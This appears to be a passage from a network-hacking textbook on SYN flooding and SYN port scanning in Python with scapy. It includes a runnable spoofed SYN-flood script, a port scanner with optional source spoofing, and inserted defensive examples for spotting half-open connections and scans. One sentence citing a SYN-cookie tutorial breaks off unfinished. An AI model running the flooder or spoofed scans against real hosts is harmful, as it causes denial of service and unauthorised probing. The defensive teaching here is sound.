
5.7 SYN-Flooder

Another variant of DoS (Denial of Service) is SYN flooding. It floods a target system with spoofed TCP packets that have the SYN flag set until the system stops accepting new connections. Remember that packets with the SYN flag set are used to initiate the three-way handshake and are answered with a SYN/ACK packet on an open port. If the requesting side never sends the corresponding ACK, the connection stays in the so-called half-open state until a timeout occurs. Once too many connections are in the half-open state, the host won't accept any further connections.

Of course you want to know how your systems react to this exceptional state, so we program a simple SYN flooder with a few lines of Python code.

```python
#!/usr/bin/env python3

import sys
from scapy.all import srflood, IP, TCP

if len(sys.argv) < 3:
    print(sys.argv[0] + " <spoofed_source_ip> <target>")
    sys.exit(0)

# One IP header with the spoofed source address, carrying a SYN
# to every port below 1024 (the backslash continues the expression)
packet = IP(src=sys.argv[1], dst=sys.argv[2]) / \
         TCP(dport=range(1, 1024), flags="S")

# Send the packets in an endless loop without storing the answers
srflood(packet, store=0)
```

Usually SYN flood attacks are combined with IP spoofing, otherwise the attackers would DoS themselves with the corresponding response packets. Furthermore, the attacker could DoS another system by spoofing its IP and even amplify the traffic, because the spoofed system will send back a RST packet for every SYN/ACK it receives.

Luckily, SYN flooding attacks are nowadays not as big a deal as they were a decade ago.

On Linux you can activate SYN cookies by executing the following:

```sh
echo 1 > /proc/sys/net/ipv4/tcp_syncookies
```

On BSD and Mac OS X systems similar mechanisms exist. For further information on SYN cookies please have a look at the tutorial from Daniel Bernstein under
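To see the half-open state from the defender's side, here is an added example (not code from the book) that replays a constructed packet trace through a minimal handshake tracker: a SYN opens an entry, the SYN/ACK moves it to half-open, and only the final ACK closes the handshake. Counting the entries that get stuck in half-open per source, or per target when the sources are spoofed, is the simplest way to spot a SYN flood in a capture. The trace, the IP addresses, the threshold and the helper names are all assumptions of this example; the sysctl path is the Linux one from the text.

```python
from collections import defaultdict

# Constructed packet summaries: (src_ip, src_port, dst_ip, dst_port, flags),
# flags written the way scapy's sprintf("%flags%") prints them.
# 203.0.113.5 completes one handshake; 198.51.100.7 sends 20 SYNs and never ACKs.
TRACE = [
    ("203.0.113.5", 40001, "192.0.2.10", 80, "S"),
    ("192.0.2.10", 80, "203.0.113.5", 40001, "SA"),
    ("203.0.113.5", 40001, "192.0.2.10", 80, "A"),
]
for sport in range(50000, 50020):
    TRACE.append(("198.51.100.7", sport, "192.0.2.10", 80, "S"))
    TRACE.append(("192.0.2.10", 80, "198.51.100.7", sport, "SA"))


def track_handshakes(trace):
    """Replay the trace and return {(src, sport, dst, dport): state}, keyed
    from the initiator's point of view.  States: syn_sent, half_open, established."""
    state = {}
    for src, sport, dst, dport, flags in trace:
        if flags == "S":
            state[(src, sport, dst, dport)] = "syn_sent"
        elif flags == "SA":
            # the server's reply: look the connection up as the initiator sees it
            key = (dst, dport, src, sport)
            if state.get(key) == "syn_sent":
                state[key] = "half_open"
        elif "R" in flags:
            # a reset from either side tears the embryonic connection down
            state.pop((src, sport, dst, dport), None)
            state.pop((dst, dport, src, sport), None)
        elif "A" in flags:
            key = (src, sport, dst, dport)
            if state.get(key) == "half_open":
                state[key] = "established"
    return state


def half_open_counts(state, by="src"):
    """Count half-open connections per initiator IP (by="src") or per target
    IP (by="dst"); the latter still works when the sources are spoofed."""
    idx = 0 if by == "src" else 2
    counts = defaultdict(int)
    for key, st in state.items():
        if st == "half_open":
            counts[key[idx]] += 1
    return dict(counts)


def suspected_floods(trace, threshold=10):
    """Source IPs holding at least `threshold` half-open connections (assumed threshold)."""
    counts = half_open_counts(track_handshakes(trace), by="src")
    return sorted(src for src, n in counts.items() if n >= threshold)


def syncookies_enabled(path="/proc/sys/net/ipv4/tcp_syncookies"):
    """True if the Linux sysctl reads 1 or 2, False if 0, None if unreadable."""
    try:
        with open(path) as f:
            return f.read().strip() in ("1", "2")
    except OSError:
        return None


if __name__ == "__main__":
    state = track_handshakes(TRACE)
    print("half-open per source:", half_open_counts(state))
    print("half-open per target:", half_open_counts(state, by="dst"))
    print("suspected floods:", suspected_floods(TRACE))
    print("SYN cookies enabled:", syncookies_enabled())
```

Note that per-source counting only works against a flooder that reuses one spoofed address; with randomised source addresses every source holds a single half-open entry, and the per-target count is the number to watch. A real tracker would also expire entries, just as the kernel does.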

5.8 Port-Scanning

Of course a chapter about TCP/IP hacking has to contain a classical port scanner.

A port scanner is a program that simply tries to establish a connection port after port and afterwards lists all the successful connections.

This technique is not only extremely noisy, because it completes a full three-way handshake for every port, but also slow. It would be far more elegant to just send a SYN packet to every port and see whether we get a SYN/ACK (open port), a RST (closed port) or no response at all (filtered port). That's exactly the tool we are going to implement now!

```python
#!/usr/bin/env python3

import sys
from scapy.all import sr, IP, TCP

if len(sys.argv) < 2:
    print(sys.argv[0] + " <host> <spoofed_source_ip>")
    sys.exit(1)

# Send SYN packets to all 1024 ports
if len(sys.argv) == 3:
    packet = IP(dst=sys.argv[1], src=sys.argv[2])
else:
    packet = IP(dst=sys.argv[1])

packet /= TCP(dport=range(1, 1025), flags="S")

answered, unanswered = sr(packet, timeout=1)

res = {}

# Process unanswered packets
for packet in unanswered:
    res[packet.dport] = "filtered"

# Process answered packets
for (send, recv) in answered:
    # Got ICMP error message
    if recv.getlayer("ICMP"):
        icmp_type = recv.getlayer("ICMP").type
        icmp_code = recv.getlayer("ICMP").code
        # Port unreachable
        if icmp_code == 3 and icmp_type == 3:
            res[send.dport] = "closed"
        else:
            res[send.dport] = ("Got ICMP with type " + str(icmp_type) +
                               " and code " + str(icmp_code))
    else:
        flags = recv.getlayer("TCP").sprintf("%flags%")

        # Got SYN/ACK
        if flags == "SA":
            res[send.dport] = "open"

        # Got RST
        elif flags == "R" or flags == "RA":
            res[send.dport] = "closed"

        # Got something else
        else:
            res[send.dport] = "Got packet with flags " + str(flags)

# Print res, sorted by port number, skipping closed ports
ports = sorted(res)

for port in ports:
    if res[port] != "closed":
        print(str(port) + ": " + res[port])
```

The tool scans only the first 1024 ports since those are the privileged ports reserved for services such as SMTP, HTTP, FTP, SSH etc. If you like, you can of course adjust the code to scan all 65536 possible ports. Optionally, the program accepts a second IP address to make the scan look as if it came from a different source. To be able to evaluate the response packets, our host must still be able to receive the traffic destined for the spoofed IP.

The function range() is new in this source code. It yields the numbers from 1 to 1024 (the end value 1025 is excluded). Also new is the function sr(), which does not only send the packets on layer 3 but also reads the corresponding response packets. The list of response packets consists of tuples that contain the packet that was sent as the first item and the response packet as the second item.

We iterate over all response packets and check whether each is an ICMP or a TCP packet by applying the getlayer() method, which returns the header of the given protocol.

If the packet is an ICMP packet, we test the type and code that signal the kind of error. If it is a TCP packet, we examine the flags that are set to determine the meaning of the response. The flags are normally a long integer in which each possible flag is a bit that is either set or unset. This is not easy for us to handle, therefore we convert the flags to a string with the help of the method sprintf. SA signals that the SYN and ACK flags are both set and therefore the port seems to be open. R or RA means that the RST, or RST and ACK, flags are set and thus the port is closed; otherwise we record the flags that were set.
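What sprintf("%flags%") hides is the bit layout of the TCP header. The following added example (not code from the book, and independent of scapy) decodes the fixed 20-byte TCP header with the standard library, renders the nine flag bits in the same letter order scapy prints them, and applies the same open/closed decision as the scanner above to the decoded flags and to an ICMP type/code pair. The header builder, the port numbers and the function names are assumptions made for this example.

```python
import struct

# Bit i of the 9-bit flag field is printed as TCP_FLAG_LETTERS[i]; this is the
# order scapy uses, so SYN|ACK (0x012) prints as "SA" and RST|ACK (0x014) as "RA".
TCP_FLAG_LETTERS = "FSRPAUECN"


def flags_to_str(flags_int):
    """Integer flag field -> letter string, e.g. 0x12 -> 'SA'."""
    return "".join(l for i, l in enumerate(TCP_FLAG_LETTERS) if flags_int & (1 << i))


def parse_tcp_header(raw):
    """Decode the fixed 20-byte part of a TCP header (RFC 793 layout)."""
    if len(raw) < 20:
        raise ValueError("need at least 20 bytes of TCP header")
    sport, dport, seq, ack, off_flags, window, checksum, urgent = \
        struct.unpack("!HHIIHHHH", raw[:20])
    return {
        "sport": sport, "dport": dport, "seq": seq, "ack": ack,
        "data_offset": (off_flags >> 12) & 0xF,   # header length in 32-bit words
        "flags_int": off_flags & 0x1FF,           # NS plus the eight classic flags
        "flags": flags_to_str(off_flags & 0x1FF),
        "window": window, "checksum": checksum, "urgent": urgent,
    }


def build_tcp_header(sport, dport, flags_str, seq=0, ack=0, window=65535):
    """Constructed test data: the inverse of parse_tcp_header, checksum left zero."""
    flags_int = sum(1 << TCP_FLAG_LETTERS.index(l) for l in flags_str)
    off_flags = (5 << 12) | flags_int   # 5 words = 20 bytes, no options
    return struct.pack("!HHIIHHHH", sport, dport, seq, ack, off_flags, window, 0, 0)


def classify_tcp_reply(flags_str):
    """The decision the scanner above makes on a TCP answer to a SYN probe."""
    if flags_str == "SA":
        return "open"
    if flags_str in ("R", "RA"):
        return "closed"
    return "Got packet with flags " + flags_str


def classify_icmp_reply(icmp_type, icmp_code):
    """The decision for an ICMP answer; type 3 / code 3 is 'port unreachable'."""
    if icmp_type == 3 and icmp_code == 3:
        return "closed"
    return "Got ICMP with type %d and code %d" % (icmp_type, icmp_code)


if __name__ == "__main__":
    for flags in ("SA", "RA", "R", "FPU", ""):
        hdr = parse_tcp_header(build_tcp_header(80, 40001, flags))
        print("%-4s 0x%03x -> %s" % (flags or "none", hdr["flags_int"],
                                     classify_tcp_reply(hdr["flags"])))
    print("ICMP 3/3 ->", classify_icmp_reply(3, 3))
```

A host whose TCP port is simply closed answers a SYN with a RST, so an ICMP unreachable in reply to a TCP probe usually comes from a filtering device in between rather than from the target itself; keeping the type and code in the result, as the scanner does, preserves that hint.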

Besides SYN scanning, there are several other techniques to scan for open ports, such as Null, FIN and XMAS scans. They use packets in which no flag, only the FIN flag, or all flags are set. RFC-conformant systems will respond with a RST packet if the port is closed and not at all if it is open or filtered, but keep in mind that modern network intrusion detection systems will raise alerts on such scans.

Better trained attackers won't scan a target sequentially, but random ports on random hosts with a random timeout to avoid being detected. Network intrusion detection systems therefore keep an eye on the number of ports tried per destination host from a single source IP, and if it gets too high they log it as a port scan and maybe even block the source IP for a given timespan. Try to scan your network and examine how your NIDS reacts. Also, try to scan with different flags set, or write a program that will only scan some interesting ports in random order, such as 21, 22, 25, 80 and 443.
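The NIDS heuristic just described, as an added example that is not part of the book: count the distinct destination ports each source touches on each host inside a sliding time window and alert above a threshold, and separately note sources that send the Null, FIN or XMAS probes from the previous paragraph. The constructed records contain an ordinary client, a fast sequential scan and a slow one that sends a probe every two minutes, which shows why the window length matters as much as the threshold. The record layout, the addresses, the window and the threshold are assumptions of this example.

```python
from collections import defaultdict, deque

# Constructed connection-attempt records: (time_s, src_ip, dst_ip, dst_port, flags),
# flags in scapy's letter notation ("" means no flag set).
EVENTS = (
    # an ordinary client talking to two web ports a few times
    [(10.0 + i, "203.0.113.5", "192.0.2.10", 80 if i % 2 else 443, "S")
     for i in range(6)]
    # a sequential SYN scan of ports 1..30 within three seconds
    + [(0.1 * i, "198.51.100.7", "192.0.2.10", i + 1, "S") for i in range(30)]
    # a slow scan: one probe every two minutes, cycling Null, FIN and XMAS probes
    + [(120.0 * i, "198.51.100.9", "192.0.2.10", 1000 + i, ("", "F", "FPU")[i % 3])
       for i in range(25)]
)

# Probe types named in the text; a SYN probe is an ordinary "S" and is only
# suspicious by its volume, not by its flags.
ODD_PROBES = {"": "null", "F": "fin", "FPU": "xmas"}


def detect_port_scans(events, window=60.0, threshold=20):
    """Flag (src, dst) pairs that touch at least `threshold` distinct ports
    inside any sliding window of `window` seconds.  Returns the highest
    distinct-port count observed for each flagged pair."""
    recent = defaultdict(deque)   # (src, dst) -> deque of (time, dport)
    alerts = {}
    for t, src, dst, dport, _flags in sorted(events):
        q = recent[(src, dst)]
        q.append((t, dport))
        while q and t - q[0][0] > window:   # expire records outside the window
            q.popleft()
        distinct = len({p for _, p in q})
        if distinct >= threshold:
            alerts[(src, dst)] = max(alerts.get((src, dst), 0), distinct)
    return alerts


def detect_odd_flags(events):
    """Sources that sent Null, FIN or XMAS probes, and which kinds."""
    seen = defaultdict(set)
    for _t, src, _dst, _dport, flags in events:
        kind = ODD_PROBES.get(flags)
        if kind:
            seen[src].add(kind)
    return dict(seen)


if __name__ == "__main__":
    print("one-minute window:", detect_port_scans(EVENTS))
    print("one-hour window  :", detect_port_scans(EVENTS, window=3600.0))
    print("odd probes       :", detect_odd_flags(EVENTS))
```

With the one-minute window only the fast scanner is reported; the slow scanner never has more than one probe inside the window and slips through on volume alone, but its flag combinations still give it away. Widening the window to an hour catches it on volume too, at the price of more state per source.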

The best documentation about port scan techniques on the internet is of course written by Fyodor, the inventor of the famous Nmap, in the Nmap documentation's page on scanning techniques (scanning-techniques.html), and you should definitely read it at least once.
